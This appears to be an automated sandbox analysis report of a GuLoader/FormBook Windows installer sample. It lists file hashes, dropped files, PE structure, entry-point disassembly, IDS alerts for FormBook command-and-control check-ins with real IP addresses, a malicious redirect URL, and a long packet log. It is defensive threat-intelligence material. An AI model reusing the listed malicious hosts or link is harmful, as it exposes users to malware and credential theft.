	SecuriteInfo.com.Variant.Lazy.368636.26283.31734.exe	Get hash	malicious	AgentTesla	Browse	162.159.133.233
	z8PEDIDODECOMPRAURGENTEpdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.7
	https://r20.rs6.net/tn.jsp?f=001LLqDI3ZfY1-fisLKt-abT64y4cYpvZMJBGSfX7X257AWmo8d_Izz_EI-3324_P0rkgJoy7O-eEF3nL7n267Rc8g3flFtl054VpUen2vkxeUppUXlQRmFeUCoQgbwDcEcq6_Qgx5G6xIrq_PZGFbliA==&c=guBvcTVUv1omzwsEXSjUMbdblRkVkBhcXdCdD7HZFgBNRaTwQadOxw==&ch=su2ZJ-6XLVH3I-XdDcMIX68vnZVcO_GGrlA3kQPahDTAWmvjcPrmIA==&__=?i=cm91cmtlbUBzY2huZWlkZXIuY29t	Get hash	malicious	Unknown	Browse	104.16.123.96
	z32CurriculumVitaeAdrianaSilva.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.232

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll	euCAWf25FG.exe	Get hash	malicious	FormBook, GuLoader	Browse
	euCAWf25FG.exe	Get hash	malicious	GuLoader	Browse
	Quotation.xls	Get hash	malicious	GuLoader	Browse
	REQUEST_FOR_QUOTATION.xls	Get hash	malicious	GuLoader	Browse
	Draft_Purchase_Order.xls	Get hash	malicious	GuLoader	Browse
	6tGbTK1i2x.exe	Get hash	malicious	FormBook, GuLoader	Browse
	6tGbTK1i2x.exe	Get hash	malicious	GuLoader	Browse
	ntJoJWf6p3.exe	Get hash	malicious	Remcos, GuLoader	Browse
	ntJoJWf6p3.exe	Get hash	malicious	GuLoader	Browse
	Quotation.xls	Get hash	malicious	GuLoader	Browse
	Hellux_certyfikat..exe	Get hash	malicious	FormBook, GuLoader	Browse
	Hellux_certyfikat..exe	Get hash	malicious	GuLoader	Browse
	ARM06PI0000001190.exe	Get hash	malicious	FormBook, GuLoader	Browse
	ARM06PI0000001190.exe	Get hash	malicious	GuLoader	Browse
	Order_From_Cuba.xls	Get hash	malicious	GuLoader	Browse
	xmAe2RZWNW.exe	Get hash	malicious	GuLoader, SmokeLoader	Browse
	qu7WsxZZHH.exe	Get hash	malicious	AgentTesla, GuLoader, SmokeLoader	Browse
	xmAe2RZWNW.exe	Get hash	malicious	GuLoader	Browse
	qu7WsxZZHH.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nssF823.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\wLlREXsA9M.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.7711167426271945
Encrypted:	false
SSDEEP:	192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
MD5:	3F176D1EE13B0D7D6BD92E1C7A0B9BAE
SHA1:	FE582246792774C2C9DD15639FFA0ACA90D6FD0B
SHA-256:	FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
SHA-512:	0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: euCAWf25FG.exe, Detection: malicious, Browse Filename: euCAWf25FG.exe, Detection: malicious, Browse Filename: Quotation.xls, Detection: malicious, Browse Filename: REQUEST_FOR_QUOTATION.xls, Detection: malicious, Browse Filename: Draft_Purchase_Order.xls, Detection: malicious, Browse Filename: 6tGbTK1i2x.exe, Detection: malicious, Browse Filename: 6tGbTK1i2x.exe, Detection: malicious, Browse Filename: ntJoJWf6p3.exe, Detection: malicious, Browse Filename: ntJoJWf6p3.exe, Detection: malicious, Browse Filename: Quotation.xls, Detection: malicious, Browse Filename: Hellux_certyfikat..exe, Detection: malicious, Browse Filename: Hellux_certyfikat..exe, Detection: malicious, Browse Filename: ARM06PI0000001190.exe, Detection: malicious, Browse Filename: ARM06PI0000001190.exe, Detection: malicious, Browse Filename: Order_From_Cuba.xls, Detection: malicious, Browse Filename: xmAe2RZWNW.exe, Detection: malicious, Browse Filename: qu7WsxZZHH.exe, Detection: malicious, Browse Filename: xmAe2RZWNW.exe, Detection: malicious, Browse Filename: qu7WsxZZHH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret\Disdiplomatize.ove

Download File

Process:	C:\Users\user\Desktop\wLlREXsA9M.exe
File Type:	data
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	7.971686301665557
Encrypted:	false
SSDEEP:	96:56WMSLa/cKQP/PD8e3J8KB1mk9EK33BTflHmXbWGwf5/XEHeXEGyjw9xaL0xxyJ0:56WMqaCP/PDVb1mkuMRTsXuXIGXaYxxV
MD5:	5E6E924B68B51E9DCAD6239B52A3D854
SHA1:	49491150C566B36DD79085DB48139B2F9BA8E1A2
SHA-256:	B0F0AD62EF69CCE3385CB8E5349BBD477B951A94AD8F985FD1BA4EE87E5958F1
SHA-512:	CAAD214CBEA86DE44E3E2F5F5DB1AB27699A31954E6381089E6DCB7E583FD0D85D6E55C8F79603108E1DE83273E0492FA42826E585AFDA14C54A12E7399AF5DE
Malicious:	false
Preview:	\...ZCuN.dm,.;2.S.J..1{.G.&xl]:)G.DP...../".H....<j<\|..a./.8..e...#ME..>>..va.Zd..j....b...$..h.N..."=o.B.L3..rxUQL.e....7/x..+...X>......L....;.R.16\..`W...3Q..>..H..#k...i.(g.J.....H..S^...[Q...yn$#m...._.{.!3;.@...,(..G..>pBw.=...(..Df...?.?.W...z=::o....9^..O[.(..Bxw,3.23.p_"c....t...."..0.t\|]8.>v.....o.]`..K.ZK.@F..I.g,s......@.>...L%..a...........-...d....@/.<E8..e+.zll..K.U.:..s.}<...T...L.@..d...&..(Qd.V..%c.R.^;.....7...K)..:.K....W:+..ZM...:7..}.j....]......q...j.b1.s..%w.Y..j.#..4..H:....+'..?}.R.-Y.............H....Z.. .......C\...B#S....I.....x./w...b....._^a..q.T.A...d#!Y...w.......M.L..a.0Sj......x.].W.5m9kx....]...h..c....%m.......C..(..<.C....T`...l.Q...........H.....i.@.....,.....NF.A....3......m.h.....'..Tma.pP.p.....~.D..u....-L.P.R..U..r.. .0...3.......h..-.kd.K&).....y.1,.v14.:..e.n....[..,.V0.".D.np1.3..5..F2I....d....Z..R...t...9............7zh.o.AL...`...9o<9F...X..0.w.......L'c<..\|q.........oV.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\Narkocentret\Pampas.sni

Download File

Process:	C:\Users\user\Desktop\wLlREXsA9M.exe
File Type:	data
Category:	dropped
Size (bytes):	4831
Entropy (8bit):	7.9584546272812675
Encrypted:	false
SSDEEP:	96:ijE/HwnhRIlvhUITP7jXHcMt6r9m2OeUacg5dWO90LZve/ndcAHe60ILEsJy:igvwvITPXXSmeUaD9qe/5HoLF
MD5:	6059D4BA84AD4AD4B807161001EE3E23
SHA1:	80D9F4925981D2D9775088605FF15B71DC277A42
SHA-256:	BFEBDC3198A49F0B527AC02E7391AFA04BB60797E77797E05DC6B5884B0043E0
SHA-512:	90D139170674BA8282DD1C707BCB2F0B17DC8326C9466C64D39689B819C8E45BC0264EBDD62AF74A433D9891023EF383F975F813127986E730503B566F4B0788
Malicious:	false
Preview:	.;p...H=...C..4C.FO....Y.4....:..r.$.o...7..m.J.g....Z...>xx:.."...6....;q..X ..\|..:.h.t.dl.t...;!......G...YR../..w.WC%&..8....+.=..>..Ff..amq......o..s.. 6.M/)..\|]_@)....L.TfI9.s.6.A<._...j{J..o.......d.J.......d......?..!..x!qp+D...A.sG..sT.?.f^b3nK0 ....ORo....#.\.;@..J.vD.....n..}7....y...].Uv....^!...n..lYa.u...~M....;....}0....vu8S.4N..0.+X#...}P......~.........=..g:._...'t.2M.j..v7...$:........1..H68T.....1V........1..5r.D.T.;.H .h....E.. ...R.yR.._.I..#...W)^....D.'..m.M.{..".a9.ik5..^...H....Sf..@=.9....9..`A.%....^....T.t.]Y.2.=..MFo].%T.Gq......o..../.@.f.......Y...6k?..c...g.=).a.~'.6.eM......g.M...C.._...O2>..z.._#.Z..6..l....a6b.r...6...>.._..Kg..1D...y=.Bo.p...S..Mr../.\..4T...f.....?fGf..z...R.F...k.Ry^.jI...%r./.GxP....G..F.9U...U.[A.....)).o......~..S....9&2=;....&7.......`.x....D.Ak.;.$.#eC.h.s..o.....N&.lU..F.~Hx.f.3.g..y...B/... _....-,+2u7}v[..=.......L...!..6O..L}...A.z.$.-.;.4.s..^T.:.8A.{.O.........P..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Strygende\ridered\Aftest\discous.Sta

Download File

Process:	C:\Users\user\Desktop\wLlREXsA9M.exe
File Type:	data
Category:	dropped
Size (bytes):	323841
Entropy (8bit):	7.509606529201207
Encrypted:	false
SSDEEP:	6144:evMtjj6lRMO4W/0/KqliKTbxrqH64oCcyuAm3B0qbjMRHvY:eyAMzW/qliAt+NDDmCqbjqPY
MD5:	DC64DAFCDB75F8C83D1123D7594C2113
SHA1:	025C40F5A7F34DF1C03684C82C58CF0CA3205563
SHA-256:	D690323020327C274567F2EC62E73A6D08E5DCBFAC7AF1081240E9BF74249643
SHA-512:	2C81E4D56590D802774186C2D0DC303BE55A4610B2644EF48F8C7BA951388DC32473330D419B946C7BA7119CF1CDA25390DBF014F1F8362B6B1D7B579C1F9F7B
Malicious:	false
Preview:	.zz...Y.......................................i.....ttt..........www....q....c............##.y..........oo..............{.HHHH....Y..H.ppppp.....ww...[./..%..........^.::.5.....r...U...F.........D.......d......\|.6...........(..h.....g...........--.q....'..................................X...................XX...........f........FFF................9......."......Z.00.........d............................::.m........ee.......KKKKKKK.G........r.4........HH.^^^^..6......................}.D............ll.............................s...KKK.............R......5../....t...eeee........s...................t.Y...........N...cccc...........22..*..{.....\......7............................i.llll...n..u..................UUUUU..........W.......UU...i.u.................................F.....................5.kk.....i.W..............'..S......-........u.....{{...pp.!!.@@.PP....N.......<<<.\|\|.....------..........j.3........m....v......ee..%%...........ii.......zzz..,,..................UU.............

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.773734561461643
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wLlREXsA9M.exe
File size:	385'144 bytes
MD5:	08defe80ace1f032875c8127ae5e4481
SHA1:	2d7ba957be6c89cd3633a63dfd8e925a90d40bd4
SHA256:	ac131e3fbcd040f4a5f0dc8e90d3c77bb98d934d5c6696de510ca89f18599062
SHA512:	09fc727fcdc86e57bc143571d061652787f2e82189255df2bebf2951ae705ef9d185646cadcd30b671233959512788c37fd6a350b28a676f064c87228bbf9bd7
SSDEEP:	6144:3BebKFxUGBNC3Iu5gro6xBcbKiydMdh5BwprYXUdOTDuCUkJf1dqDQrFGCf:4KFxc3Iu5g86xKbUdOmrUUdmuROOkrF5
TLSH:	3584CE16199F587FCC81AB70797FC20582EF7E91FE05B5F5410A6A0BE83D1EE0A4A4C9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L.....MX.................^.........

File Icon


Icon Hash:	d239ccd65ed94339

Static PE Info

General

Entrypoint:	0x40316d
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x584DCA2E [Sun Dec 11 21:50:38 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Ansttelsesomraadet@Emblement.Ner, OU="Arrogantness Exhilarated Unwarnedness ", O=Securiferous, L=Croze, S=Nouvelle-Aquitaine, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	08/08/2022 02:31:14 07/08/2025 02:31:14
Subject Chain	E=Ansttelsesomraadet@Emblement.Ner, OU="Arrogantness Exhilarated Unwarnedness ", O=Securiferous, L=Croze, S=Nouvelle-Aquitaine, C=FR
Version:	3
Thumbprint MD5:	4B8D7B6B4EFB2B51AEFF756AE0F919FF
Thumbprint SHA-1:	0AE947AF904B4418F431AB214E9EBDD5FAE6FA76
Thumbprint SHA-256:	90B6DB172732EC8430BE9CABF2E5956F156F7BBF0342B6FB404F461092284582
Serial:	55E223524583FF09CF32F534EB1809BBE23A3514

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007F8F3CA60FD3h
push ebx
call 00007F8F3CA63F41h
cmp eax, ebx
je 00007F8F3CA60FC9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F8F3CA63EBDh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F8F3CA60FADh
push ebp
push 00000009h
call 00007F8F3CA63F14h
push 00000007h
call 00007F8F3CA63F0Dh
mov dword ptr [00423704h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407174h]
push 00409188h
push 00422F00h
call 00007F8F3CA63B37h
call dword ptr [0040709Ch]
mov ebp, 00429000h
push eax
push ebp
call 00007F8F3CA63B25h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x32000	0x11ab8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x5d638	0xa40
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5cef	0x5e00	False	0.6637716090425532	data	6.441287066791648	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1246	0x1400	False	0.42734375	data	5.005029341587408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	False	0.638671875	data	5.114501100832899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0xe000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x32000	0x11ab8	0x11c00	False	0.27098921654929575	data	5.972468893305727	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x32208	0x11028	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.2631903777701229
RT_DIALOG	0x43230	0x100	data	English	United States	0.5234375
RT_DIALOG	0x43330	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x43450	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x43518	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x43578	0x14	Targa image data - Map 32 x 4136 x 1 +1	English	United States	1.15
RT_VERSION	0x43590	0x1e8	data	English	United States	0.5266393442622951
RT_MANIFEST	0x43778	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.20107.148.132.4649890802031412 08/02/23-20:42:14.890453	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49890	80	192.168.11.20	107.148.132.46
192.168.11.20198.46.176.18949842802018752 08/02/23-20:35:21.593019	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49842	80	192.168.11.20	198.46.176.189
192.168.11.20107.148.132.4649871802031412 08/02/23-20:36:48.343466	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49871	80	192.168.11.20	107.148.132.46
192.168.11.20199.188.104.12049867802031412 08/02/23-20:36:06.692983	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49867	80	192.168.11.20	199.188.104.120
192.168.11.209.9.9.959142532023883 08/02/23-20:40:13.224871	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	59142	53	192.168.11.20	9.9.9.9
192.168.11.2052.76.96.9149873802031412 08/02/23-20:37:10.365400	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49873	80	192.168.11.20	52.76.96.91
192.168.11.2045.77.219.22649878802031412 08/02/23-20:38:31.526546	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49878	80	192.168.11.20	45.77.219.226

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2023 20:35:21.469480991 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.592278957 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.592541933 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.593019009 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728261948 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728357077 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728425026 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728488922 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728508949 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728553057 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728576899 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728578091 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728619099 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728683949 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728708982 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728708982 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728749037 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728774071 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728815079 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728884935 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.728890896 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728948116 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.728948116 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.729080915 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.854820013 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.854851961 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.854873896 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.854897022 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855056047 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855083942 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855087042 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.855107069 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855129004 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855150938 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855173111 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855195045 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855216026 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855237961 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855258942 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855279922 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855288029 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.855300903 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855323076 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855345011 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855366945 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.855379105 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.855411053 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.855513096 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.855545998 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.965868950 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.965971947 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966048002 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966111898 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966156960 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966176987 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966219902 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966245890 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966329098 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966372967 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966387987 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966419935 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966445923 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966501951 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966557026 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966588974 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966613054 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966638088 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966670990 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966727018 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966742039 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966783047 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966790915 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966790915 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966839075 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966847897 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966895103 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966901064 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966950893 CEST	80	49842	198.46.176.189	192.168.11.20
Aug 2, 2023 20:35:21.966953039 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.966989994 CEST	49842	80	192.168.11.20	198.46.176.189
Aug 2, 2023 20:35:21.967006922 CEST	80	49842	198.46.176.189	192.168.11.20
